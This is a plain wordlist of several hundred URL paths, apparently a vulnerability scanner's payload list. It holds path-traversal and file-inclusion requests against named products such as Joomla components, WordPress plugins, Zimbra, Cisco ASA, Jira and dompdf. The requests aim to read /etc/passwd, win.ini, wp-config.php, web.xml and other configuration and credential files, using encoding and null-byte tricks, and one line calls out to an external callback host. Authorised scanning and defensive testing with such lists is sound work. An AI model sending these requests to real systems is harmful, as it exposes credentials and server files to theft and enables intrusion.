/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/comm.php?id=../../../../../../../../../../etc/passwd
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/../../etc/passwd
/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00
/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/index.php?r=i/../../../../../etc/passwd
/index.php?class=../../../../../../../etc/passwd%00
/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/webEdition/showTempFile.php?file=../../../../etc/passwd
/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
/process/feries.php?fichier=../../../../../../../etc/passwd
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd
/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/fw/mindex.do?url=./WEB-INF/web.xml%3f
/base_import/static/c:/windows/win.ini
/base_import/static/etc/passwd
/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
/fcgi-bin/wgsetcgi
/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
/node_modules/../../../../../etc/passwd
/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/plugins/search/..\..\..\conf\openfire.xml
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/_next/static/../server/pages-manifest.json
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF
/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF
/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/loginLess/../../etc/passwd
/s/{{randstr}}/_/;/WEB-INF/web.xml
/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd
/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test
/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/..\..\..\..\Windows\win.ini
/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/../conf/config.properties
/.//WEB-INF/classes/META-INF/microprofile-config.properties
/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename={{filename}}.txt&ContentType=application/octet-stream
/./../../../../../../../../../../etc/passwd
/api/image/cover-upload?filename=../appsettings.json
/admin/protected/selector/server_file/files?folder=C://&suffix=
/admin/protected/selector/server_file/files?folder=/&suffix=
/appmonitor/protected/selector/server_file/files?folder=C://&suffix=
/appmonitor/protected/selector/server_file/files?folder=/&suffix=
///////../../../etc/passwd
/static///////../../../../etc/passwd
///../app.js
/__nuxt_vite_node__/module//bin/passwd
/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe
/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik
/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd
/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
{{paths}}
/cgi-bin/ExportSettings.sh
/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/
/assets/built%2F..%2F..%2F/package.json
/assets/built%2F..%2F..%2F%E0%A4%A/package.json
/api/BetterImageGallery/imagehandler?path=../../../Web.Config
/dompdf.php?input_file=php://filter/resource=/etc/passwd
/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd
/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/dompdf.php
/wp-content/plugins/
/portal//..\\\..\\\..\\\..\\\windows\win.ini
